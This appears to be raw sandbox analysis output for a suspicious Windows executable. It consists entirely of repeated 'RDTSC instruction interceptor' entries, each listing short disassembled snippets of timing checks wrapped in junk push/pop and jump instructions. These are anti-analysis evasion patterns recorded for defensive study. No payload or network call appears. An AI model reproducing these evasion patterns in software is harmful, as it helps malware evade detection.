Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC29E9 second address: EC29F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC29F2 second address: EC2A2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CF2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F43C9098CFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC2A2E second address: EC2A38 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9B03 second address: EC9B27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F43C9098CFAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9854 second address: EC985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC985A second address: EC985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC985E second address: EC9862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9862 second address: EC986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43C9098CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC986E second address: EC9874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: ED44B9 second address: ED44DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC813 second address: EDC819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC819 second address: EDC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC81D second address: EDC83B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EE9054 second address: EE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6E2 second address: EEA6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6E6 second address: EEA6EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6EB second address: EEA6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6F8 second address: EEA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6FE second address: EEA704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED861 second address: EED86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED86A second address: EED871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED580 second address: EED584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F0C second address: F06F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C8AE0087h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F37 second address: F06F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F43C9098CE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F43C9098CF3h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F7C second address: F06F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F05E80 second address: F05E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F05E84 second address: F05E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F0643D second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06445 second address: F06455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C9098CEAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06455 second address: F0645C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06985 second address: F06989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06989 second address: F0699B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F0699B second address: F069B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43C9098CF1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F069B8 second address: F069BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F069BC second address: F069C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06C6D second address: F06C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410033 second address: 541003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 22h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541003A second address: 5410040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410040 second address: 5410077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, AB49h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F43C9098CF4h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410077 second address: 541007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541007B second address: 541007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541007F second address: 5410085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0E64 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0E85 second address: 53F0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bh, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C8AE0080h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0EA2 second address: 53F0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0EC9 second address: 53F0ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0ED9 second address: 53F0F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F43C9098CF7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F2B second address: 5430F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F3A second address: 5430F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F3E second address: 5430F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F4E second address: 5430F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F52 second address: 5430F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F56 second address: 5430F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F5C second address: 5430F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F62 second address: 5430F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D008F second address: 53D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43C8AE007Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 pushfd 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 sub ah, FFFFFFC6h 0x0000001c jmp 00007F43C8AE0081h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D00F8 second address: 53D0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0185 second address: 53D018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D018B second address: 53D0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C2C second address: 53F0C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C32 second address: 53F0C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C36 second address: 53F0C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C3A second address: 53F0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov si, 5469h 0x0000000e jmp 00007F43C9098CF6h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F43C9098CF0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F43C9098CF7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C8D second address: 53F0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 340672BAh 0x00000008 mov dh, 00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F073B second address: 53F0764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F43C9098CEAh 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F43C9098CECh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0656 second address: 53F065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F065C second address: 53F0693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C9098CEBh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43C9098CF0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0693 second address: 53F0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0697 second address: 53F069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0BDD second address: 53D0BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0D88 second address: 53E0D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0D8C second address: 53E0D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53E0A8D second address: 53E0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E73 second address: 5450E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E79 second address: 5450E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450E7D second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450EAB second address: 5450EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 1599C5F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450EB5 second address: 5450ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450514 second address: 5450530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545033A second address: 545038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 48786F68h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov ebx, 19C13044h 0x0000001a pushfd 0x0000001b jmp 00007F43C8AE007Dh 0x00000020 sub eax, 7724E186h 0x00000026 jmp 00007F43C8AE0081h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F43C8AE007Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545038C second address: 54503A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54503A8 second address: 54503AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54503AC second address: 54503B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0167 second address: 53F01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Ah 0x00000011 or esi, 610588F8h 0x00000017 jmp 00007F43C8AE007Bh 0x0000001c popfd 0x0000001d call 00007F43C8AE0088h 0x00000022 movzx ecx, di 0x00000025 pop edi 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007F43C8AE0083h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F01C5 second address: 53F01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F01C9 second address: 53F0229 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43C8AE0084h 0x00000008 adc ecx, 16CF34E8h 0x0000000e jmp 00007F43C8AE007Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43C8AE0084h 0x0000001f add si, 4748h 0x00000024 jmp 00007F43C8AE007Bh 0x00000029 popfd 0x0000002a mov ax, 4EBFh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov dl, B8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5450686 second address: 545068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 545068C second address: 54506AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bl, ah 0x0000000e mov edx, 26EF6E4Eh 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506AE second address: 54506B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506B2 second address: 54506C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506C0 second address: 54506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54506D2 second address: 54506F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, 22EEA83Fh 0x00000011 popad 0x00000012 push 912E01ADh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F43C8AE007Eh 0x0000001e rdtsc
